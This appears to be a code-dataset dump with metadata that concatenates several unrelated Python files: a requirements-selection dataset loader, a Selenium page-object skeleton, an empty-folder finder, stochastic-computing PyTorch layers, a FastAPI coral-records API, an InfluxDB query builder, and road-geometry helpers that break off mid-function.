                    self.new_dependencies.setdefault(dep, []).append(dep2)
                    self.aux_dependencies(dep, dep2)
        # store new dependencies non repeatedly:
        self.dependencies = np.empty(len(self.dependencies), dtype=object)
        for i in range(len(self.dependencies)):
            if i not in self.new_dependencies:
                self.dependencies[i] = None
            else:
                # dict.fromkeys preserves order while removing duplicates
                self.dependencies[i] = list(
                    dict.fromkeys(self.new_dependencies[i]))

    def normalize(self) -> None:
        """Given the costs, importances and priorities, this method calculates the total satisfaction and score, and scales cost and
        satisfaction using min-max normalization
        """
        num_pbis = len(self.pbis_cost)
        # total satisfaction per pbi: importance-weighted priority sum
        self.pbis_satisfaction = self.stakeholders_importances.dot(
            self.stakeholders_pbis_priorities)
        # now two escalation follows, based on
        # https://en.wikipedia.org/wiki/Feature_scaling#Rescaling_(min-max_normalization)
        # scale pbis cost in range [0-1]
        margin = 1 / num_pbis  # used to avoid zeros
        # NOTE(review): the denominator uses sum() - min() rather than
        # max() - min(); this is not classic min-max scaling — confirm
        # against the published formulation before changing.
        diff = np.sum(self.pbis_cost) - np.min(self.pbis_cost)
        self.pbis_cost_scaled = (self.pbis_cost - np.min(self.pbis_cost) +
                                 margin) / (diff + margin)
        # scale pbis satisfaction in range[0-1]
        diff = np.sum(self.pbis_satisfaction) - np.min(self.pbis_satisfaction)
        self.pbis_satisfaction_scaled = (
            self.pbis_satisfaction - np.min(self.pbis_satisfaction) + margin) / (diff + margin)
        # each pbi score is computed from the scaled versions of pbi satisfaction and cost
        self.pbis_score = self.pbis_satisfaction_scaled / self.pbis_cost_scaled
| 44.890756
| 132
| 0.629539
|
from pathlib import Path
from typing import Dict
import numpy as np
import json
import uuid
class Dataset:
"""
Class used to load datasets as published in
del Sagrado, José del Águila, Isabel M. Orellana, Francisco J.
Multi-objective ant colony optimization for requirements selection.
Empirical Software Engineering. Vol. 20(3). 2015.
"""
def __init__(self, dataset: str = "test", source_file: str = None, source_dict: Dict = None):
    """Loads dataset vectors depending on the dataset name.
    """
    # Three mutually exclusive sources: an explicit JSON file, an
    # in-memory dict, or a named dataset under datasets/<name>.json.
    if source_file:
        with open(source_file) as json_file:
            # use filename as dataset id
            self.id = Path(source_file).stem
            json_data = json.load(json_file)
            self.load_from_dict(json_data)
    elif source_dict:
        # anonymous dict source: generate a random id
        self.id = uuid.uuid4().hex
        self.load_from_dict(source_dict)
    else:  # if not source file->search dataset json in datasets folder
        self.id = dataset
        with open("datasets/"+dataset+".json") as json_file:
            json_data = json.load(json_file)
            self.load_from_dict(json_data)
    # normalize values calculating scaled satisfactions, costs and scores
    self.normalize()
    # simplify dependencies:
    if self.dependencies is not None:
        self.list_of_sons = self.dependencies.copy()  # needed in feda_algorithm.py
        self.calculate_dependencies()
def load_from_dict(self, source_dict: Dict) -> None:
    """Populate cost/importance/priority vectors (and optional dependency
    lists, coerced to ints) from a parsed dataset JSON dictionary."""
    self.pbis_cost = np.array(source_dict["pbis_cost"]).astype(int)
    self.num_pbis = len(self.pbis_cost)
    self.stakeholders_importances = np.array(
        source_dict["stakeholders_importances"]).astype(int)
    self.stakeholders_pbis_priorities = np.array(
        source_dict["stakeholders_pbis_priorities"]).astype(int)
    if "dependencies" not in source_dict:
        self.dependencies = None
        return
    self.dependencies = np.array(source_dict["dependencies"], dtype=object)
    for row in range(len(self.dependencies)):
        deps = self.dependencies[row]
        if deps is None:
            continue
        for col in range(len(deps)):
            deps[col] = int(deps[col])
def calculate_dependencies(self) -> None:
"""Given the list of dependencies, recursively stores dependencies of requirements,
saving in each requirements index all the requirements that have to be included to satisfy the dependency restrictions.
"""
self.new_dependencies = {}
# dependency = index_dependency+1 (starts from 1)
for dep in range(len(self.dependencies)):
if self.dependencies[dep] is not None:
# if req has dependencies -> add them and launch aux fun
for dep2 in self.dependencies[dep]:
self.new_dependencies.setdefault(dep, []).append(dep2)
self.aux_dependencies(dep, dep2)
# store new dependencies non repeatedly:
self.dependencies = np.empty(len(self.dependencies), dtype=object)
for i in range(len(self.dependencies)):
if i not in self.new_dependencies:
self.dependencies[i] = None
else:
self.dependencies[i] = list(
dict.fromkeys(self.new_dependencies[i]))
def aux_dependencies(self, parent: int, child: int) -> None:
# if no dependencies in child -> stop
if self.dependencies[child] is None:
return
# for each dependency in child -> if it is already the parent or contained in parent -> stop
for d in self.dependencies[child]:
if (d == parent) or (d in self.new_dependencies[parent]):
continue
# if not -> add new dependency to parent list and recursively launch aux fun
self.new_dependencies.setdefault(parent, []).append(d)
self.aux_dependencies(parent, d)
def normalize(self) -> None:
"""Given the costs, importances and priorities, this method calculates the total satisfaction and score, and scales cost and
satisfaction using min-max normalization
"""
num_pbis = len(self.pbis_cost)
self.pbis_satisfaction = self.stakeholders_importances.dot(
self.stakeholders_pbis_priorities)
# now two escalation follows, based on
# https://en.wikipedia.org/wiki/Feature_scaling#Rescaling_(min-max_normalization)
# scale pbis cost in range [0-1]
margin = 1 / num_pbis # used to avoid zeros
diff = np.sum(self.pbis_cost) - np.min(self.pbis_cost)
self.pbis_cost_scaled = (self.pbis_cost - np.min(self.pbis_cost) +
margin) / (diff + margin)
# scale pbis satisfaction in range[0-1]
diff = np.sum(self.pbis_satisfaction) - np.min(self.pbis_satisfaction)
self.pbis_satisfaction_scaled = (
self.pbis_satisfaction - np.min(self.pbis_satisfaction) + margin) / (diff + margin)
# each pbi score is computed from the scaled versions of pbi satisfaction and cost
self.pbis_score = self.pbis_satisfaction_scaled / self.pbis_cost_scaled
| 1,433
| 0
| 54
|
3792bb295ce140fd83de2476bc2ef2dd61c51b3c
| 798
|
py
|
Python
|
04_Selenium/exercices/framework/pages/homePage.py
|
twiindan/selenium_lessons
|
798557e8f584f9e6655414c13f232017483f0439
|
[
"Apache-2.0"
] | null | null | null |
04_Selenium/exercices/framework/pages/homePage.py
|
twiindan/selenium_lessons
|
798557e8f584f9e6655414c13f232017483f0439
|
[
"Apache-2.0"
] | null | null | null |
04_Selenium/exercices/framework/pages/homePage.py
|
twiindan/selenium_lessons
|
798557e8f584f9e6655414c13f232017483f0439
|
[
"Apache-2.0"
] | 1
|
2020-07-16T09:49:47.000Z
|
2020-07-16T09:49:47.000Z
|
from exercices.solutions.framework.core.base import BasePage
from exercices.solutions.framework.pages.newUserPage import newUserPage
| 24.9375
| 71
| 0.709273
|
from exercices.solutions.framework.core.base import BasePage
from exercices.solutions.framework.pages.newUserPage import newUserPage
class homePage(BasePage):
    """Page object for the forum home page (exercise skeleton).

    Element locators and navigation methods are intentionally left
    unimplemented for the Selenium exercises.
    """

    url = 'https://forum-testing.herokuapp.com/v1.0/'

    # Link elements, filled in by locate_elements().
    _newUserLink = None
    _listUserLink = None
    _newForumMessageLink = None
    _listForumLink = None

    def locate_elements(self):
        """Locate all the elements of the Home Page."""

    def navigate_new_user_page(self):
        """Navigate to the new user page."""

    def navigate_new_forum_message_page(self):
        """Navigate to the new forum message page."""

    def navigate_user_list_page(self):
        """Navigate to the user list."""

    def navigate_forum_messages_list_page(self):
        """Navigate to the forum message list."""
| 139
| 501
| 23
|
6bfaf0bbaf4dbb45c5506ffcaa6481da16b4e9c0
| 48
|
py
|
Python
|
adet/utils/__init__.py
|
gist-ailab/uoais
|
fb42d9a96cd54daad61c956d8d9d65dd0ebef4c7
|
[
"BSD-2-Clause"
] | 52
|
2021-09-26T05:06:01.000Z
|
2022-03-27T07:48:19.000Z
|
adet/utils/__init__.py
|
gist-ailab/uoais
|
fb42d9a96cd54daad61c956d8d9d65dd0ebef4c7
|
[
"BSD-2-Clause"
] | 5
|
2021-10-12T00:39:45.000Z
|
2022-03-24T08:59:57.000Z
|
adet/utils/__init__.py
|
gist-ailab/uoais
|
fb42d9a96cd54daad61c956d8d9d65dd0ebef4c7
|
[
"BSD-2-Clause"
] | 9
|
2021-09-27T11:59:31.000Z
|
2022-03-23T07:49:15.000Z
|
# from .post_process import detector_postprocess
| 48
| 48
| 0.875
|
# from .post_process import detector_postprocess
| 0
| 0
| 0
|
3e641f99e90f1c6c1550d7bfd5ada58210b9afba
| 586
|
py
|
Python
|
src/directory.py
|
emptyfolderfinder/emptyfolderfinder-py
|
6c6dbbb204fa9c0b8db318f5b7d001d0b5d791e3
|
[
"MIT"
] | null | null | null |
src/directory.py
|
emptyfolderfinder/emptyfolderfinder-py
|
6c6dbbb204fa9c0b8db318f5b7d001d0b5d791e3
|
[
"MIT"
] | null | null | null |
src/directory.py
|
emptyfolderfinder/emptyfolderfinder-py
|
6c6dbbb204fa9c0b8db318f5b7d001d0b5d791e3
|
[
"MIT"
] | null | null | null |
import os
from pathlib import Path
| 20.206897
| 54
| 0.622867
|
import os
from pathlib import Path
def check_directory(path):
    """Recursively collect the paths of all "empty" directories under *path*.

    A directory counts as empty when it contains no files and every one of
    its subdirectories is itself recursively empty.  The returned list holds
    the empty descendants first, then *path* itself if it qualifies.

    Bug fix: the previous version kept only the LAST subdirectory's result
    in ``empty_dirs`` and compared its length against ``len(dirs)``, which
    could wrongly mark a parent as empty (e.g. a single non-empty child that
    happens to contain one empty grandchild).  We now count, per child,
    whether the child itself appears in its own result list.
    """
    result = []
    p = Path(path)
    subdirs = [x for x in p.iterdir() if x.is_dir()]
    files = [x for x in p.iterdir() if not x.is_dir()]
    # Truly empty leaf directory.
    if not files and not subdirs:
        return [path]
    empty_subdir_count = 0
    for subdir in subdirs:
        sub_path = subdir.as_posix()
        sub_result = check_directory(sub_path)
        result.extend(sub_result)
        # A subdirectory is itself empty exactly when its own path is
        # present in the list it returned.
        if sub_path in sub_result:
            empty_subdir_count += 1
    if empty_subdir_count == len(subdirs) and not files:
        result.append(path)
    return result
def delete_directories(dirs):
    """Remove every directory in *dirs* (each must already be empty)."""
    for directory in dirs:
        os.rmdir(directory)
| 505
| 0
| 46
|
c9865590a677790e0075a322e7d3bd02271fcc17
| 3,828
|
py
|
Python
|
utils_class.py
|
nanocad-lab/geo
|
2eb324b07c7c92b84a123f3a158723a2e3a77730
|
[
"MIT"
] | 1
|
2021-09-19T14:32:21.000Z
|
2021-09-19T14:32:21.000Z
|
utils_class.py
|
nanocad-lab/geo
|
2eb324b07c7c92b84a123f3a158723a2e3a77730
|
[
"MIT"
] | null | null | null |
utils_class.py
|
nanocad-lab/geo
|
2eb324b07c7c92b84a123f3a158723a2e3a77730
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils_functional
'''
Custom layers for SC
'''
class Conv2d_Add_Partial(nn.Conv2d):
'''
SC Conv2d using partial binary add
'''
def forward(self, input, prec=7, err=7, forward='1d_bin', generator='lfsr', z_unit=8, legacy=False, load_unit=8, load_wait_w=2, load_wait_a=2):
'''
Arguments:
prec: weight and activation precision to quantize to
err: stream length in the form of 2**err
forward: sc compute. Specifically how accumulation is done
generator: stream generator
z_unit: number of input channles to sum using OR accumulation when forward==yz_bin
legacy: disable accelerated kernels
load_unit: number of bits to load each time for progressive loading
load_wait_w: number of cycles to wait between loading weights for progressive loading
load_wait_a: number of cycles to wait between loading activations for progressive loading
'''
input.data = utils_functional.quantize(input.data, prec=prec)
self.weight.data = utils_functional.quantize(self.weight_org, prec=prec)
out = utils_functional.conv2d_generic(input, self.weight, bit_length=2**err, padding=self.padding, stride=self.stride, forward=forward, generator=generator, legacy=legacy, z_unit=z_unit, load_unit=load_unit, load_wait_w=load_wait_w, load_wait_a=load_wait_a)
return out
class BatchNorm2d_fixed(nn.BatchNorm2d):
'''
Quantized 2d batchnorm
'''
class BatchNorm1d_fixed(nn.BatchNorm1d):
'''
Quantized 1d batchnorm
'''
| 41.16129
| 265
| 0.637147
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils_functional
'''
Custom layers for SC
'''
class Conv2d_Add_Partial(nn.Conv2d):
    '''
    SC Conv2d using partial binary add

    Stochastic-computing convolution layer: keeps a full-precision copy of
    the weights in the `weight_org` buffer and re-quantizes both weights and
    activations on every forward pass.
    '''
    def __init__(self, *kargs, **kwargs):
        super(Conv2d_Add_Partial, self).__init__(*kargs, **kwargs)
        # Full-precision snapshot of the initial weights; forward() always
        # quantizes from this buffer so repeated quantization does not
        # progressively degrade the weights.
        self.register_buffer('weight_org', self.weight.data.clone())
    def forward(self, input, prec=7, err=7, forward='1d_bin', generator='lfsr', z_unit=8, legacy=False, load_unit=8, load_wait_w=2, load_wait_a=2):
        '''
        Arguments:
            prec: weight and activation precision to quantize to
            err: stream length in the form of 2**err
            forward: sc compute. Specifically how accumulation is done
            generator: stream generator
            z_unit: number of input channels to sum using OR accumulation when forward==yz_bin
            legacy: disable accelerated kernels
            load_unit: number of bits to load each time for progressive loading
            load_wait_w: number of cycles to wait between loading weights for progressive loading
            load_wait_a: number of cycles to wait between loading activations for progressive loading
        '''
        # Quantize activations in place and refresh the quantized weights
        # from the full-precision copy kept in weight_org.
        input.data = utils_functional.quantize(input.data, prec=prec)
        self.weight.data = utils_functional.quantize(self.weight_org, prec=prec)
        out = utils_functional.conv2d_generic(input, self.weight, bit_length=2**err, padding=self.padding, stride=self.stride, forward=forward, generator=generator, legacy=legacy, z_unit=z_unit, load_unit=load_unit, load_wait_w=load_wait_w, load_wait_a=load_wait_a)
        return out
class BatchNorm2d_fixed(nn.BatchNorm2d):
    '''
    Quantized 2d batchnorm

    Runs the regular float batch-norm for the autograd graph, then
    overwrites the output's .data with a shift-quantized affine transform
    (w_n*x + b_n) so the forward values match fixed-point behaviour while
    gradients still flow through the float path.
    '''
    def __init__(self, *kargs, **kwargs):
        super(BatchNorm2d_fixed, self).__init__(*kargs, **kwargs)
        # Shift-quantization scale produced by utils_functional.quantize_shift.
        self.register_buffer('scale', None)
    def forward(self, x):
        out = F.batch_norm(x, self.running_mean, self.running_var, self.weight, self.bias, training=self.training)
        # Statistics used for the quantized path: batch stats when training,
        # running stats otherwise (mirrors F.batch_norm's choice).
        if self.training:
            mean = x.mean(dim=(0,2,3))
            var = x.var(dim=(0,2,3), unbiased=False)
        else:
            mean = self.running_mean
            var = self.running_var
        if self.affine:
            weight = self.weight.data
            bias = self.bias.data
        else:
            weight = 1
            bias = 0
        # Fold normalization + affine into a single per-channel w_n*x + b_n.
        w_n = weight/torch.sqrt(var + self.eps)
        b_n = bias - mean*weight/torch.sqrt(var + self.eps)
        # b_n reuses w_n's scale so both share one shift amount.
        w_n, self.scale = utils_functional.quantize_shift(w_n.detach())
        b_n, _ = utils_functional.quantize_shift(b_n.detach(), self.scale)
        # Reshape to (C,1,1) for broadcasting over (N,C,H,W).
        w_n = w_n.reshape(w_n.size(0),1,1)
        b_n = b_n.reshape(b_n.size(0),1,1)
        # Overwrite .data only: forward values are quantized, backward is not.
        out.data = (x.data*w_n + b_n).to(out.dtype)
        return out
class BatchNorm1d_fixed(nn.BatchNorm1d):
    '''
    Quantized 1d batchnorm

    1-D counterpart of BatchNorm2d_fixed: float batch-norm for autograd,
    then the output's .data is replaced by a shift-quantized w_n*x + b_n.
    '''
    def __init__(self, *kargs, **kwargs):
        super(BatchNorm1d_fixed, self).__init__(*kargs, **kwargs)
        # Shift-quantization scale produced by utils_functional.quantize_shift.
        self.register_buffer('scale', None)
    def forward(self, x):
        out = F.batch_norm(x, self.running_mean, self.running_var, self.weight, self.bias, training=self.training)
        if self.training:
            mean = x.mean(dim=(0))
            var = x.var(dim=(0), unbiased=False)
        else:
            mean = self.running_mean
            var = self.running_var
        if self.affine:
            weight = self.weight.data
            bias = self.bias.data
        else:
            weight = 1
            bias = 0
        # Fold normalization + affine into a single per-feature w_n*x + b_n.
        w_n = weight/torch.sqrt(var + self.eps)
        b_n = bias - mean*weight/torch.sqrt(var + self.eps)
        # NOTE(review): unlike BatchNorm2d_fixed, w_n/b_n are NOT detach()ed
        # before quantize_shift here — confirm whether that asymmetry is
        # intentional.
        w_n, self.scale = utils_functional.quantize_shift(w_n)
        b_n, _ = utils_functional.quantize_shift(b_n, self.scale)
        out.data = (x.data*w_n + b_n).to(out.dtype)
        return out
| 2,062
| 0
| 130
|
d62a105eab4d7fcf7ae14ec1fe61bbdad0b4e98e
| 3,305
|
py
|
Python
|
corals-api.py
|
DevEliran/deep-sea-api
|
3562840f9d0fd0f4bb2edc89804f8709bb37d92d
|
[
"MIT"
] | null | null | null |
corals-api.py
|
DevEliran/deep-sea-api
|
3562840f9d0fd0f4bb2edc89804f8709bb37d92d
|
[
"MIT"
] | null | null | null |
corals-api.py
|
DevEliran/deep-sea-api
|
3562840f9d0fd0f4bb2edc89804f8709bb37d92d
|
[
"MIT"
] | null | null | null |
from fastapi import FastAPI, Path, status
from pydantic import BaseModel
from fastapi.responses import JSONResponse
from starlette.status import (
HTTP_200_OK,
HTTP_404_NOT_FOUND,
HTTP_409_CONFLICT
)
from database import CoralDatabase, get_coral_by_catalog_number_db, \
get_coral_by_category_db, add_coral_to_db, update_coral_db, delete_coral_db
from api_utils import api_reply
app = FastAPI()
db = CoralDatabase()
@app.get("/")
@app.get("/coral/{catalog_number}")
@app.get("/coral-category/{coral_category}")
@app.post("/new-coral/{catalog_number}")
@app.put("/update-coral/{catalog_number}")
@app.delete("/delete-coral/{catalog_number}")
| 32.722772
| 121
| 0.659002
|
from fastapi import FastAPI, Path, status
from pydantic import BaseModel
from fastapi.responses import JSONResponse
from starlette.status import (
HTTP_200_OK,
HTTP_404_NOT_FOUND,
HTTP_409_CONFLICT
)
from database import CoralDatabase, get_coral_by_catalog_number_db, \
get_coral_by_category_db, add_coral_to_db, update_coral_db, delete_coral_db
from api_utils import api_reply
app = FastAPI()
db = CoralDatabase()
class Coral(BaseModel):
    """Pydantic schema for a single coral occurrence record.

    Field order matches the positional arguments expected by the
    add_coral_to_db / update_coral_db helpers.
    """
    catalog_number: int
    data_provider: str
    scientific_name: str
    vernacular_name_category: str
    taxon_rank: str
    station: str
    observation_date: str
    latitude: str
    longitude: str
    depth: int
@app.get("/")
def root():
    """Landing endpoint: greets API clients with a 200 response."""
    payload = {'message': "Welcome to Corals-API"}
    return JSONResponse(payload, status_code=HTTP_200_OK)
@app.get("/coral/{catalog_number}")
def get_coral_by_catalog_number(catalog_number: int = Path(None, description="Catalog Number of the coral to retrieve")):
    """Look up one coral by catalog number and wrap it via api_reply."""
    coral = get_coral_by_catalog_number_db(catalog_number)
    return api_reply(coral)
@app.get("/coral-category/{coral_category}")
def get_coral_by_category(coral_category: str = Path(None, description="Category of corals you want to retrieve")):
    """Return all corals in the given category, wrapped via api_reply."""
    corals = get_coral_by_category_db(coral_category)
    return api_reply(corals)
@app.post("/new-coral/{catalog_number}")
def create_coral(catalog_number: int, coral: Coral):
    """Insert a new coral record; responds 409 if the catalog number exists."""
    if get_coral_by_catalog_number_db(catalog_number):
        return JSONResponse({'message': 'Catalog Number Already Exists'},
                            status_code=HTTP_409_CONFLICT)
    # Fields are passed positionally in the DB helper's expected order.
    add_coral_to_db(catalog_number,
                    coral.data_provider,
                    coral.scientific_name,
                    coral.vernacular_name_category,
                    coral.taxon_rank,
                    coral.station,
                    coral.observation_date,
                    coral.latitude,
                    coral.longitude,
                    coral.depth)
    return JSONResponse({'message': 'Coral Created Successfully'},
                        status_code=status.HTTP_201_CREATED)
@app.put("/update-coral/{catalog_number}")
def update_coral(catalog_number: int, coral: Coral):
    """Replace the stored record for catalog_number; 404 if it is unknown.

    Consistency fix: the path parameter is now annotated ``int`` to match
    the create/get endpoints and the ``Coral.catalog_number`` field (it was
    annotated ``str`` before, so FastAPI skipped integer validation here).
    """
    if not get_coral_by_catalog_number_db(catalog_number):
        return JSONResponse({'message': 'Coral Not Found'},
                            status_code=HTTP_404_NOT_FOUND)
    # Fields are passed positionally in the DB helper's expected order.
    update_coral_db(catalog_number,
                    coral.data_provider,
                    coral.scientific_name,
                    coral.vernacular_name_category,
                    coral.taxon_rank,
                    coral.station,
                    coral.observation_date,
                    coral.latitude,
                    coral.longitude,
                    coral.depth)
    return JSONResponse({'message': 'Coral Information Updated'},
                        status_code=status.HTTP_200_OK)
@app.delete("/delete-coral/{catalog_number}")
def delete_coral(catalog_number: int):
    """Delete the record for catalog_number; 404 if it is unknown.

    Consistency fix: path parameter annotated ``int`` (was ``str``) to match
    the other endpoints and the ``Coral.catalog_number`` field type.
    """
    if not get_coral_by_catalog_number_db(catalog_number):
        return JSONResponse({'message': 'Coral Not Found'},
                            status_code=HTTP_404_NOT_FOUND)
    delete_coral_db(catalog_number)
    return JSONResponse({'message': 'Coral Deleted Successfully'},
                        status_code=status.HTTP_200_OK)
| 2,259
| 223
| 155
|
35544107af096841bd233ad45b9e4391ff8f3e32
| 178
|
py
|
Python
|
{{ cookiecutter.repo_name }}/{{cookiecutter.project_slug}}/__init__.py
|
jakebrinkmann/waldo-jakebrinkmann
|
a625bff7ba9a3319968f7512d8bfa05408737dcf
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.repo_name }}/{{cookiecutter.project_slug}}/__init__.py
|
jakebrinkmann/waldo-jakebrinkmann
|
a625bff7ba9a3319968f7512d8bfa05408737dcf
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.repo_name }}/{{cookiecutter.project_slug}}/__init__.py
|
jakebrinkmann/waldo-jakebrinkmann
|
a625bff7ba9a3319968f7512d8bfa05408737dcf
|
[
"MIT"
] | null | null | null |
"""Global configuration used across all subsystems."""
import os
__version__ = os.getenv("PKG_VERSION", "0.0.0")
epilog = "‹/› with ♥ from South Dakota © 2018 Jake Brinkmann"
| 22.25
| 61
| 0.702247
|
"""Global configuration used across all subsystems."""
import os
__version__ = os.getenv("PKG_VERSION", "0.0.0")
epilog = "‹/› with ♥ from South Dakota © 2018 Jake Brinkmann"
| 0
| 0
| 0
|
7fc20f8bcaf00f7d5d6c15cebba383ee4e7d8652
| 3,583
|
py
|
Python
|
influxalchemy/query.py
|
GerasimovRM/influxalchemy
|
c6527dc99f18f58da0d2f6602759be40f24d4b44
|
[
"MIT"
] | 42
|
2016-08-16T11:36:10.000Z
|
2022-02-14T15:50:53.000Z
|
influxalchemy/query.py
|
GerasimovRM/influxalchemy
|
c6527dc99f18f58da0d2f6602759be40f24d4b44
|
[
"MIT"
] | 10
|
2017-02-01T16:16:06.000Z
|
2022-01-21T23:25:22.000Z
|
influxalchemy/query.py
|
GerasimovRM/influxalchemy
|
c6527dc99f18f58da0d2f6602759be40f24d4b44
|
[
"MIT"
] | 6
|
2016-10-26T13:10:21.000Z
|
2021-02-19T10:27:07.000Z
|
"""
InfluxDB Query Object.
"""
import functools
from influxalchemy import meta
class InfluxDBQuery:
"""
InfluxDB Query object.
entities (tuple): Query entities
client (InfluxAlchemy): InfluxAlchemy instance
expressions (tuple): Query filters
groupby (str): GROUP BY string
limit (int): LIMIT int
"""
def execute(self):
"""
Execute query.
"""
return self._client.bind.query(str(self))
def filter(self, *expressions):
"""
Filter query.
"""
expressions = self._expressions + expressions
return InfluxDBQuery(self._entities, self._client,
expressions=expressions)
def filter_by(self, **kwargs):
"""
Filter query by tag value.
"""
expressions = self._expressions
for key, val in sorted(kwargs.items()):
expressions += (meta.TagExp.equals(key, val),)
return InfluxDBQuery(self._entities, self._client,
expressions=expressions)
def group_by(self, groupby):
"""
Group query.
"""
return InfluxDBQuery(
self._entities, self._client, self._expressions, groupby)
def limit(self, limit):
"""
Limit query
"""
assert isinstance(limit, int)
return InfluxDBQuery(
self._entities, self._client, self._expressions, self._groupby,
limit)
@property
def measurement(self):
"""
Query measurement.
"""
measurements = set(x.measurement for x in self._entities)
return functools.reduce(lambda x, y: x | y, measurements)
@property
def _select(self):
"""
SELECT statement.
"""
selects = []
for ent in self._entities:
# Entity is a Tag
if isinstance(ent, meta.Tag):
selects.append(str(ent))
# Entity is a Measurement
else:
try:
for tag in self._client.tags(ent):
selects.append(tag)
for field in self._client.fields(ent):
selects.append(field)
# pylint: disable=broad-except
except Exception:
pass
return selects or ["*"]
@property
def _from(self):
"""
FROM statement.
"""
return str(self.measurement)
@property
def _where(self):
"""
WHERE statement.
"""
for exp in self._expressions:
yield "(%s)" % exp
| 27.775194
| 75
| 0.521909
|
"""
InfluxDB Query Object.
"""
import functools
from influxalchemy import meta
class InfluxDBQuery:
    """
    InfluxDB Query object.

    Immutable-style builder: every filter/group/limit call returns a new
    InfluxDBQuery; str(query) renders the final InfluxQL statement.

    entities (tuple): Query entities
    client (InfluxAlchemy): InfluxAlchemy instance
    expressions (tuple): Query filters
    groupby (str): GROUP BY string
    limit (int): LIMIT int
    """
    def __init__(self, entities, client, expressions=None, groupby=None,
                 limit=None):
        # pylint: disable=too-many-arguments
        self._entities = entities
        self._client = client
        # () rather than None so later concatenation/iteration just works
        self._expressions = expressions or ()
        self._groupby = groupby
        self._limit = limit
    def __str__(self):
        # Render the InfluxQL statement, appending optional clauses in order.
        select = ", ".join(self._select)
        from_ = self._from
        where = " AND ".join(self._where)
        # any() on a string is True iff it is non-empty (chars are truthy)
        if any(where):
            iql = "SELECT %s FROM %s WHERE %s" % (select, from_, where)
        else:
            iql = "SELECT %s FROM %s" % (select, from_)
        if self._groupby is not None:
            iql += " GROUP BY %s" % self._groupby
        if self._limit is not None:
            iql += " LIMIT {0}".format(self._limit)
        return "%s;" % iql
    def __repr__(self):
        return str(self)
    def execute(self):
        """
        Execute query.
        """
        return self._client.bind.query(str(self))
    def filter(self, *expressions):
        """
        Filter query.
        """
        expressions = self._expressions + expressions
        return InfluxDBQuery(self._entities, self._client,
                             expressions=expressions)
    def filter_by(self, **kwargs):
        """
        Filter query by tag value.
        """
        expressions = self._expressions
        # sorted() keeps the rendered WHERE clause deterministic
        for key, val in sorted(kwargs.items()):
            expressions += (meta.TagExp.equals(key, val),)
        return InfluxDBQuery(self._entities, self._client,
                             expressions=expressions)
    def group_by(self, groupby):
        """
        Group query.
        """
        return InfluxDBQuery(
            self._entities, self._client, self._expressions, groupby)
    def limit(self, limit):
        """
        Limit query
        """
        assert isinstance(limit, int)
        return InfluxDBQuery(
            self._entities, self._client, self._expressions, self._groupby,
            limit)
    @property
    def measurement(self):
        """
        Query measurement.
        """
        # OR-reduce the entities' measurements into a single one
        measurements = set(x.measurement for x in self._entities)
        return functools.reduce(lambda x, y: x | y, measurements)
    @property
    def _select(self):
        """
        SELECT statement.
        """
        selects = []
        for ent in self._entities:
            # Entity is a Tag
            if isinstance(ent, meta.Tag):
                selects.append(str(ent))
            # Entity is a Measurement
            else:
                try:
                    for tag in self._client.tags(ent):
                        selects.append(tag)
                    for field in self._client.fields(ent):
                        selects.append(field)
                # pylint: disable=broad-except
                except Exception:
                    # best-effort introspection; fall back to SELECT *
                    pass
        return selects or ["*"]
    @property
    def _from(self):
        """
        FROM statement.
        """
        return str(self.measurement)
    @property
    def _where(self):
        """
        WHERE statement.
        """
        for exp in self._expressions:
            yield "(%s)" % exp
| 790
| 0
| 80
|
e08eefad4432b67364fe41a8cc2b8d494cbdbd9c
| 17,559
|
py
|
Python
|
src/utils.py
|
kylejbrown17/PythonRoadways
|
438400c046db7ee52182de2fbea77f1b1b57de61
|
[
"MIT"
] | null | null | null |
src/utils.py
|
kylejbrown17/PythonRoadways
|
438400c046db7ee52182de2fbea77f1b1b57de61
|
[
"MIT"
] | null | null | null |
src/utils.py
|
kylejbrown17/PythonRoadways
|
438400c046db7ee52182de2fbea77f1b1b57de61
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy import interpolate
import ezdxf
import h5py
from copy import copy
from Roadways import *
def NormalVectorToLineSegment(linepts, pt):
    """Perpendicular (rejection) component of each point relative to a segment.

    linepts: np.array([[x1, x2], [y1, y2]]) defining the segment.
    pt: shape (2,) single point or (2, N) batch of points.
    Returns a (2, N) array of normal vectors from the segment's line.
    """
    pts = pt if pt.ndim > 1 else np.expand_dims(pt, 1)
    origin = np.expand_dims(linepts[:, 0], 1)
    direction = np.expand_dims(linepts[:, 1] - linepts[:, 0], 1)
    direction = direction / np.linalg.norm(direction)
    offsets = pts - origin
    # Subtract the projection onto the unit direction to get the rejection.
    return offsets - direction * direction.T.dot(offsets)
def NormalDisplacementFromLineSegment(linepts, pt):
    """
    returns a positive or negative distance for each query point

    linepts: np.array([[x1, x2], [y1, y2]]); pt: shape (2,) or (2, N).
    The sign encodes which side of the segment direction the point lies on.
    """
    # Robustness fix: accept a single (2,) point, mirroring
    # NormalVectorToLineSegment.  Without this guard a 1-D pt silently
    # broadcast against the (2,1) base point and produced wrong shapes.
    if pt.ndim == 1:
        pt = np.expand_dims(pt, 1)
    base_pt = np.expand_dims(linepts[:,0],1)
    base_vec = np.expand_dims(linepts[:,1] - linepts[:,0],1)
    base_vec = base_vec / np.linalg.norm(base_vec)
    diff_vec = pt - base_pt
    # 2-D cross product sign picks the side of the line.
    sign = np.sign(np.cross(diff_vec.T,base_vec.T))
    dist = np.sqrt(np.sum((diff_vec - base_vec * base_vec.T.dot(diff_vec))**2,axis=0))
    return sign * dist
def SplitLineRecursive(linepts,i,j,THRESHOLD=5.0,ds_min=50.0):
    """
    Choose best point at which to split a line to minimize total reprojection error

    linepts: (2, N) polyline points; i, j: endpoint indices of the span.
    Returns an index k in (i, j] at which to split (k == j means no split).
    """
    # If the chord i->j already fits within THRESHOLD, only split spans
    # longer than ds_min (near their arclength midpoint).
    max_err = np.max(ProjectionError(np.stack((linepts[:,i],linepts[:,j])).T, linepts[:,i:j]))
    if max_err < THRESHOLD:
        ds = np.cumsum(np.sqrt(np.sum(np.diff(linepts[:,i:j])**2,axis=0)))
        if ds[-1] > ds_min:
            k = i + np.argmin((ds - ds[-1]/2.)**2) + 1
            return k
        else:
            return j
    errors1 = np.zeros(j-(i+1))
    errors2 = np.zeros(j-(i+1))
    max_errors1 = np.zeros(j-(i+1))
    max_errors2 = np.zeros(j-(i+1))
    # Score every interior split candidate by the mean reprojection error
    # of the two resulting chords.
    for k in range(i+1,j):
